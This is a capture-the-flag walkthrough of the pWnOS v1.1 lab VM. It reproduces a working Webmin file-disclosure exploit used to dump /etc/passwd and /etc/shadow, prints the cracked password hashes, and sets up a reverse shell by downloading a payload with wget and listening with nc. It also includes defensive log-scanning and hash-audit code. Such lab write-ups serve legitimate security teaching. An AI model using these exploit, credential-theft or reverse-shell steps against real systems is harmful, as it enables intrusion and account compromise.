pWnOS v1.1

Prateek Sarangi
9 min read, Sep 25, 2021


Before starting the walkthrough, I would like to thank Darknet Diaries for somehow subconsciously making my head itch whenever I look at something out of order. More on that later. The download link for pWnOS v1.1: https://www.vulnhub.com/entry/pwnos-10,33/

Nmap scan

Yeah, a routine check-up of the vulnerable machine. Let’s start:

$ nmap -p- -T4 -A 192.168.162.144
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 13:24 EDT
Nmap scan report for 192.168.162.144
Host is up (0.0046s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_ 2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h30m05s, deviation: 3h32m08s, median: 4s
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| NetBIOS computer name:
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
|_ System time: 2021-09-24T12:25:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.30 seconds

Samba smbd, well, the legendary remote buffer-overflow vulnerability might work.

Okay, so I poked around it a lot, but with no results at all. So I went on to look at the website.

Website

Again, I tried inspecting the page source for clues (just like in a CTF, how foolish am I!!) and ended up at a dead end here as well. So now is the time for the itch on my head.

Recently, listening to Darknet Diaries, I came across an episode about Mimikatz. I don’t remember much of it, and it has nothing to do with this box either. But somehow port 10000 running MiniServ got me interested, and I jumped to that.

Port 10000 — Miniserv

So, right away I opened the website on this port,

Okay, some credential stuffing might work? Maybe; you may try that. But I actually started searching for a MiniServ exploit in searchsploit.

I know what you are thinking: why searchsploit? Why not Google? Well, my internet was down at that particular time!! No special reason.

And luckily, I got two exploits related to this particular module. (Lucky break!!)

Gaining access to the machine

So, I used 1997.php (Because it’s my birth year!!) and continued with the exploit.

<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

// COMMAND-LINE ARGUMENTS (default to "" so a missing argument falls through to the usage text)
$host = $argv[1] ?? "";
$port = $argv[2] ?? "";
$http = $argv[3] ?? "";
$file = $argv[4] ?? "";

// CHECKING THE INPUT
if ($host != "" && $port != "" && $http != "" && $file != "") {

    // BUILD THE TRAVERSAL PREFIX: 61 "/..%01" SEGMENTS
    $z = "/..%01";
    for ($i = 0; $i < 60; $i++) {
        $z .= "/..%01";
    }

    $target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file;

    echo "Attacking ".$host."\n";
    echo "---------------------------------\n";

    // INITIALIZING CURL SESSION TO THE TARGET
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

    $content = curl_exec($ch);

    // CLOSING CURL
    curl_close($ch);

    // ECHOING THE CONTENT OF THE $FILE
    echo $content;

    echo "---------------------------------\n";
    echo "Coded by joffer , http://securitydot.net\n";

} else {
    // IF INPUT IS NOT CORRECT DISPLAY THE README
    echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
    echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
    echo "Coded by joffer , http://securitydot.net\n";
}

?>

# milw0rm.com [2006-07-09]

Saved this code to a file named webmin.php and ran the exploit,

$ cp /usr/share/exploitdb/exploits/multiple/remote/1997.php webmin.php
$ php -f webmin.php 192.168.162.144 10000 http /etc/passwd
$ php -f webmin.php 192.168.162.144 10000 http /etc/shadow

passwd.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

shadow.txt

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
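The exploit above works because Webmin before 1.290 stripped plain ".." segments from the URL but not ".." followed by the %01 byte, while the filesystem still stepped one directory up for each such segment. Here is an added example (not part of the original post or the exploit) showing how a defender would spot those requests in an access log: the log lines are constructed in Common Log Format, the attacker address reuses the Kali IP from the walkthrough, and the four-step traversal depth (instead of the exploit's 61) is my choice.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Common Log Format (not from the post); 192.168.162.128
# plays the Kali box from the walkthrough. Four traversal steps instead of 61 for brevity.
SAMPLE_LOG = """\
192.168.162.128 - - [24/Sep/2021:13:40:01 -0500] "GET /unauthenticated/..%01/..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 1431
192.168.162.128 - - [24/Sep/2021:13:40:05 -0500] "GET /unauthenticated/..%01/..%01/..%01/..%01/etc/shadow HTTP/1.1" 200 1042
192.168.162.130 - - [24/Sep/2021:13:41:17 -0500] "GET /unauthenticated/style.css HTTP/1.1" 200 2201
192.168.162.130 - - [24/Sep/2021:13:41:18 -0500] "GET /session_login.cgi HTTP/1.1" 200 3320
192.168.162.128 - - [24/Sep/2021:13:45:30 -0500] "GET /unauthenticated/..%01/..%01/..%01/..%01/home/vmware/rshell.cgi HTTP/1.1" 200 0
"""
CLF_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def decode_path(path, rounds=3):
    """Percent-decode repeatedly (bounded) so double encoding cannot hide '..%01'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_bypass_segment(seg):
    """'..' followed by a control byte: slips past a naive '..' filter while the
    OS path lookup still walks one directory up (the pre-1.290 Webmin bug)."""
    return len(seg) > 2 and seg.startswith("..") and ord(seg[2]) < 0x20

def resolved_path(path):
    """Collapse '..' and bypass segments like the filesystem would, to show what was read."""
    stack = []
    for seg in decode_path(path).split("/"):
        if seg == ".." or is_bypass_segment(seg):
            if stack:
                stack.pop()
        elif seg and seg != ".":
            stack.append(seg)
    return "/" + "/".join(stack)

def scan(log_text):
    """One finding per request that uses the control-byte traversal bypass."""
    findings = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        depth = sum(1 for s in decode_path(m["path"]).split("/") if is_bypass_segment(s))
        if depth:
            findings.append({"ip": m["ip"], "status": int(m["status"]), "depth": depth,
                             "unauthenticated": m["path"].startswith("/unauthenticated/"),
                             "file": resolved_path(m["path"])})
    return findings
```

Run `scan(SAMPLE_LOG)` to get the three traversal requests with the file each one reached; a 200 status on one of them is the signal that the disclosure succeeded.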

So, now it’s time for John the Ripper.

John the Ripper

But first we have to unshadow the two files into one, and then run John on it!!

$ unshadow hashes.txt shadow.txt > complete_hashes.txt
$ cat complete_hashes.txt
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:!:100:101::/nonexistent:/bin/false
syslog:!:101:102::/home/syslog:/bin/false
klog:!:102:103::/home/klog:/bin/false
mysql:!:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:!:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:1001:1001::/home/obama:/bin/bash
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:1002:1002::/home/osama:/bin/bash
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:1003:1003::/home/yomama:/bin/bash

Now, we apply John the Ripper to get our username and password,

$ john --wordlist=/usr/share/wordlists/rockyou.txt complete_hashes.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 4.27% (ETA: 15:17:29) 0g/s 77897p/s 389583c/s 389583C/s ZAIDA1..Vacation1
0g 0:00:00:12 5.75% (ETA: 15:17:27) 0g/s 78216p/s 391104c/s 391104C/s gordob..goodies15
0g 0:00:00:13 6.26% (ETA: 15:17:26) 0g/s 78247p/s 391325c/s 391325C/s b012689855..azelie
0g 0:00:00:14 6.70% (ETA: 15:17:27) 0g/s 77986p/s 389931c/s 389931C/s 2774629..272389
0g 0:00:00:15 7.15% (ETA: 15:17:28) 0g/s 77664p/s 388396c/s 388396C/s whitterbug..whiteclv2
0g 0:00:00:16 7.66% (ETA: 15:17:27) 0g/s 77513p/s 387621c/s 387621C/s sydneym..syahanim
0g 0:00:00:17 8.16% (ETA: 15:17:27) 0g/s 77240p/s 386268c/s 386268C/s samuelsamuel..samsears1
0g 0:00:00:18 8.63% (ETA: 15:17:27) 0g/s 77008p/s 385040c/s 385040C/s pita64..pisces80
0g 0:00:00:19 9.13% (ETA: 15:17:27) 0g/s 76870p/s 384398c/s 384398C/s my881202..my way
0g 0:00:00:20 9.63% (ETA: 15:17:26) 0g/s 76771p/s 383856c/s 383856C/s maddiexo..madamecurie
0g 0:00:00:21 10.12% (ETA: 15:17:26) 0g/s 76653p/s 383310c/s 383310C/s kitkat86..kisstar
0g 0:00:00:22 10.61% (ETA: 15:17:26) 0g/s 76608p/s 383092c/s 383092C/s jane369..janaira
0g 0:00:01:01 28.95% (ETA: 15:17:29) 0g/s 69903p/s 349528c/s 349528C/s regger...regert
0g 0:00:01:02 29.53% (ETA: 15:17:28) 0g/s 70072p/s 350361c/s 350361C/s raintree21..rainman3
0g 0:00:01:03 30.03% (ETA: 15:17:28) 0g/s 70059p/s 350298c/s 350298C/s pxx277..pxlina
0g 0:00:01:04 30.63% (ETA: 15:17:27) 0g/s 70184p/s 350931c/s 350931C/s powerbooster..power2lc
0g 0:00:01:05 31.18% (ETA: 15:17:27) 0g/s 70247p/s 351248c/s 351248C/s pjtfsagfsb..pjp1691
0g 0:00:01:06 31.72% (ETA: 15:17:27) 0g/s 70302p/s 351517c/s 351517C/s petra140..petney09
0g 0:00:01:07 32.30% (ETA: 15:17:26) 0g/s 70396p/s 352000c/s 352000C/s password0701..passward0
0g 0:00:01:09 33.46% (ETA: 15:17:25) 0g/s 70637p/s 353187c/s 353187C/s offandon01..ofdark99
0g 0:00:01:11 34.58% (ETA: 15:17:24) 0g/s 70848p/s 354248c/s 354248C/s nice9955..nice one
0g 0:00:01:12 35.13% (ETA: 15:17:23) 0g/s 70934p/s 354686c/s 354686C/s nathys09..nathiya1458
0g 0:00:01:33 46.65% (ETA: 15:17:18) 0g/s 71880p/s 359410c/s 359410C/s jye14300..jya57jdr
0g 0:00:01:35 47.79% (ETA: 15:17:17) 0g/s 72003p/s 360015c/s 360015C/s joaqui23..joaoinacio
0g 0:00:01:36 48.29% (ETA: 15:17:17) 0g/s 72034p/s 360178c/s 360178C/s jg33351..jg116217
0g 0:00:01:37 48.83% (ETA: 15:17:17) 0g/s 72053p/s 360279c/s 360279C/s jdm100187..jdkhan2
0g 0:00:01:38 49.33% (ETA: 15:17:17) 0g/s 72047p/s 360246c/s 360246C/s jan31st..jan2549
0g 0:00:01:39 49.86% (ETA: 15:17:17) 0g/s 72068p/s 360347c/s 360347C/s j111486..j106858
0g 0:00:01:40 50.44% (ETA: 15:17:17) 0g/s 72118p/s 360590c/s 360590C/s info5503..infini44
0g 0:00:01:41 51.09% (ETA: 15:17:16) 0g/s 72161p/s 360811c/s 360811C/s ilovedamo69..ilovecujo
0g 0:00:01:42 51.63% (ETA: 15:17:16) 0g/s 72139p/s 360707c/s 360707C/s i851367..i6k5m4n3
0g 0:00:01:43 52.16% (ETA: 15:17:16) 0g/s 72127p/s 360644c/s 360644C/s honey0603..honestluv
0g 0:00:01:44 52.70% (ETA: 15:17:16) 0g/s 72146p/s 360736c/s 360736C/s help9..helomates@
0g 0:00:01:45 53.25% (ETA: 15:17:16) 0g/s 72141p/s 360706c/s 360706C/s halsea..haloo3beta
h4ckm3 (vmware)
1g 0:00:01:46 53.72% (ETA: 15:17:16) 0.009433g/s 72088p/s 360023c/s 360023C/s grizzly63..gritsey
1g 0:00:01:48 55.11% (ETA: 15:17:14) 0.009258g/s 72505p/s 360369c/s 360369C/s gal1005..gajito
1g 0:00:01:49 55.73% (ETA: 15:17:14) 0.009173g/s 72603p/s 360114c/s 360114C/s frances5017..france0730
1g 0:00:01:50 56.36% (ETA: 15:17:14) 0.009090g/s 72720p/s 359950c/s 359950C/s ferreiram..ferrari462
1g 0:00:01:51 56.97% (ETA: 15:17:13) 0.009008g/s 72813p/s 359700c/s 359700C/s exemplo..exclusivesoundz
1g 0:00:01:52 57.58% (ETA: 15:17:13) 0.008927g/s 72898p/s 359430c/s 359430C/s emz42889..emylouis2
1g 0:00:01:53 58.30% (ETA: 15:17:12) 0.008848g/s 73114p/s 359690c/s 359690C/s edwardam..edward0425
1g 0:00:01:54 58.94% (ETA: 15:17:12) 0.008771g/s 73283p/s 359782c/s 359782C/s drewwasere..drewnellie
1g 0:00:01:55 59.55% (ETA: 15:17:12) 0.008694g/s 73388p/s 359618c/s 359618C/s dj1419..dj072488
1g 0:00:01:56 60.16% (ETA: 15:17:11) 0.008619g/s 73458p/s 359325c/s 359325C/s derbycity1..derakh69
1g 0:00:01:57 60.80% (ETA: 15:17:11) 0.008546g/s 73586p/s 359282c/s 359282C/s darvin_3..dartmouth372
1g 0:00:02:14 71.65% (ETA: 15:17:06) 0.007462g/s 75162p/s 357344c/s 357344C/s aldrenjinky..aldomoxoteadoro
1g 0:00:02:15 72.27% (ETA: 15:17:05) 0.007406g/s 75262p/s 357328c/s 357328C/s adriano0309..adrianita9443
1g 0:00:02:16 72.86% (ETA: 15:17:05) 0.007352g/s 75326p/s 357179c/s 357179C/s a5b7j3a..a576255
1g 0:00:02:17 73.40% (ETA: 15:17:05) 0.007298g/s 75332p/s 356791c/s 356791C/s VICTORIA!..VICHORARO
1g 0:00:02:18 74.03% (ETA: 15:17:05) 0.007246g/s 75433p/s 356792c/s 356792C/s Shamarri..Shaicai
1g 0:00:02:19 74.61% (ETA: 15:17:05) 0.007194g/s 75482p/s 356593c/s 356593C/s ROSARED..RORO06
1g 0:00:02:20 75.08% (ETA: 15:17:05) 0.007142g/s 75407p/s 355901c/s 355901C/s PAULCHRISTIAN..PATTY3107
1g 0:00:02:21 75.71% (ETA: 15:17:05) 0.007092g/s 75500p/s 355892c/s 355892C/s MZGOLLIDAY..MZ.PRUITT
1g 0:00:02:22 76.37% (ETA: 15:17:04) 0.007041g/s 75633p/s 356038c/s 356038C/s LILNIQ90..LILMEATBALL7
1g 0:00:02:23 76.97% (ETA: 15:17:04) 0.006992g/s 75702p/s 355937c/s 355937C/s Jackdee55..Jacinda11
1g 0:00:02:24 77.58% (ETA: 15:17:04) 0.006944g/s 75774p/s 355858c/s 355858C/s HOMEGIRL11..HOLLY16
1g 0:00:02:25 78.19% (ETA: 15:17:04) 0.006896g/s 75845p/s 355783c/s 355783C/s EV3491..EUAN0916
1g 0:00:02:26 78.72% (ETA: 15:17:04) 0.006849g/s 75838p/s 355399c/s 355399C/s Crawbaby19..Crabucawoog
1g 0:00:02:27 79.40% (ETA: 15:17:04) 0.006802g/s 75971p/s 355570c/s 355570C/s BRYTT8298..BRWNEYESW5894
1g 0:00:02:28 80.00% (ETA: 15:17:03) 0.006756g/s 76028p/s 355448c/s 355448C/s ALLY1826..ALLF!EN
1g 0:00:02:29 80.70% (ETA: 15:17:03) 0.006711g/s 76109p/s 355430c/s 355430C/s 974685..97446015763285
1g 0:00:02:30 81.18% (ETA: 15:17:03) 0.006666g/s 76069p/s 354930c/s 354930C/s 93010615..92valleyview
1g 0:00:02:31 81.79% (ETA: 15:17:03) 0.006622g/s 76166p/s 354983c/s 354983C/s 8842973..884049
1g 0:00:02:32 82.37% (ETA: 15:17:03) 0.006578g/s 76261p/s 355033c/s 355033C/s 81151128..8112a
1g 0:00:02:33 83.00% (ETA: 15:17:03) 0.006535g/s 76407p/s 355285c/s 355285C/s 7405597..7402914
1g 0:00:02:34 83.60% (ETA: 15:17:03) 0.006493g/s 76522p/s 355426c/s 355426C/s 6677901..667584
1g 0:00:02:35 84.24% (ETA: 15:17:03) 0.006451g/s 76677p/s 355727c/s 355727C/s 596208a..596013
1g 0:00:02:36 84.85% (ETA: 15:17:02) 0.006410g/s 76812p/s 355960c/s 355960C/s 5368615..5366888
1g 0:00:02:37 85.48% (ETA: 15:17:02) 0.006369g/s 76927p/s 356106c/s 356106C/s 4910051..490810357
1g 0:00:02:38 86.11% (ETA: 15:17:02) 0.006329g/s 77061p/s 356338c/s 356338C/s 436012..435822
1g 0:00:02:41 87.90% (ETA: 15:17:02) 0.006210g/s 77320p/s 356475c/s 356475C/s 297386..2971708
1g 0:00:02:46 91.35% (ETA: 15:17:00) 0.006023g/s 78010p/s 357813c/s 357813C/s 164352456..16417625
1g 0:00:02:47 92.05% (ETA: 15:17:00) 0.005988g/s 78137p/s 358051c/s 358051C/s 1341700043469..134078c
1g 0:00:02:48 92.76% (ETA: 15:17:00) 0.005952g/s 78245p/s 358208c/s 358208C/s 11ons00..11mt43bg
1g 0:00:02:49 93.44% (ETA: 15:16:59) 0.005916g/s 78343p/s 358332c/s 358332C/s 10007701mf..1000185
1g 0:00:02:50 94.19% (ETA: 15:16:59) 0.005882g/s 78454p/s 358512c/s 358512C/s 09099497799..090985870
1g 0:00:02:51 94.93% (ETA: 15:16:59) 0.005847g/s 78543p/s 358605c/s 358605C/s 0869290132..0869228856
1g 0:00:02:53 96.45% (ETA: 15:16:58) 0.005780g/s 78737p/s 358868c/s 358868C/s 0810201160..0810139082
1g 0:00:02:54 97.13% (ETA: 15:16:58) 0.005747g/s 78811p/s 358909c/s 358909C/s 06666660..066607218
1g 0:00:02:55 97.79% (ETA: 15:16:57) 0.005713g/s 78881p/s 358937c/s 358937C/s 044331048..044284515
1g 0:00:02:56 98.43% (ETA: 15:16:57) 0.005681g/s 78943p/s 358941c/s 358941C/s 026008..025941484
1g 0:00:02:57 99.13% (ETA: 15:16:57) 0.005649g/s 79022p/s 359015c/s 359015C/s 0122261297..012209647
1g 0:00:02:58 99.90% (ETA: 15:16:57) 0.005617g/s 79134p/s 359220c/s 359220C/s #bommel85..#Berloul
1g 0:00:02:58 DONE (2021-09-24 15:16) 0.005612g/s 79142p/s 359216c/s 359216C/s ejngyhga007..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So, we got it, Username — vmware, Password — h4ckm3
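What unshadow does, and why John loaded these hashes as md5crypt: here is an added example (not from the post) that joins the two files the same way unshadow does and flags accounts that combine a login shell with a fast crypt(3) scheme, which is exactly the condition the rockyou run above took advantage of. The sample entries are a subset of the passwd/shadow output shown earlier; the prefix table and the no-login shell list are my assumptions.

```python
# Subset of the passwd.txt / shadow.txt output shown in the post (values as on the page).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
"""
SHADOW = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
"""
# crypt(3) prefixes (assumed table). md5crypt ($1$) and descrypt are fast enough that a
# rockyou run like the one in the post finishes in minutes; the others are deliberately slow.
HASH_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                 "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
FAST_HASHES = {"md5crypt", "descrypt"}
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}

def parse_colon_file(text):
    """Map user name -> remaining colon-separated fields (passwd and shadow share the layout)."""
    return {l.split(":", 1)[0]: l.split(":")[1:] for l in text.splitlines() if l.strip()}

def hash_type(field):
    """Classify a shadow password field: locked, a known crypt(3) scheme, or 13-char DES."""
    if field in ("", "*") or field.startswith("!"):
        return "locked"
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "descrypt" if len(field) == 13 else "unknown"

def unshadow(passwd_text, shadow_text):
    """Re-create unshadow(8): each passwd line with its 'x' replaced by the shadow hash."""
    shadow = parse_colon_file(shadow_text)
    lines = []
    for name, fields in parse_colon_file(passwd_text).items():
        if name in shadow:
            fields[0] = shadow[name][0]
        lines.append(name + ":" + ":".join(fields))
    return lines

def audit(passwd_text, shadow_text):
    """Per account: hash scheme, whether the shell allows login, and whether both
    together expose a fast hash to offline guessing (the condition John exploited)."""
    shadow = parse_colon_file(shadow_text)
    report = []
    for name, fields in parse_colon_file(passwd_text).items():
        kind = hash_type(shadow.get(name, ["x"])[0])
        login = fields[-1] not in NOLOGIN_SHELLS
        report.append({"user": name, "hash": kind, "login": login,
                       "weak": login and kind in FAST_HASHES})
    return report
```

`unshadow(PASSWD, SHADOW)` reproduces the complete_hashes.txt lines above, and `audit` reports root and vmware as the two login-capable accounts stored with md5crypt.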

SSH Login

Okay, we got in, but we aren’t root yet. Time for some PrivEsc.

Privilege Escalation

We are in the system, so let’s reuse the same PHP code, placed on the remote system, to get a reverse shell back to our machine.

In the Kali machine,

$ cp /usr/share/exploitdb/exploits/multiple/remote/1997.php rshell.cgi
$ nano rshell.cgi

Change the following lines in the code,

Then it’s time to serve rshell.cgi from the Kali machine and fetch it from the target with wget. In the Kali terminal,

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.162.144 - - [25/Sep/2021 03:10:18] "GET /rshell.cgi HTTP/1.0" 200 -

This serves the Kali machine’s current directory on port 8000, so we can now go to the target machine and wget the rshell.

vmware@ubuntuvm:~$ wget http://192.168.162.128:8000/rshell.cgi
--02:10:22-- http://192.168.162.128:8000/rshell.cgi
=> `rshell.cgi'
Connecting to 192.168.162.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,718 (3.6K) [application/octet-stream]

100%[=================================================================================================================================>] 3,718 --.--K/s

02:10:22 (980.30 MB/s) - `rshell.cgi' saved [3718/3718]

Once we have rshell.cgi on the remote machine, we can start our PrivEsc exploit. Let’s start by making rshell.cgi executable with chmod on the remote machine.

vmware@ubuntuvm:~$ chmod +x rshell.cgi

On the Kali terminal, start listening at port 4444,

$ nc -nvlp 4444
listening on [any] 4444 ...

Open up another Kali terminal and execute the following command,

$ php -f webmin.php 192.168.162.144 10000 http /home/vmware/rshell.cgi

And finally, we got root. Hurray!!
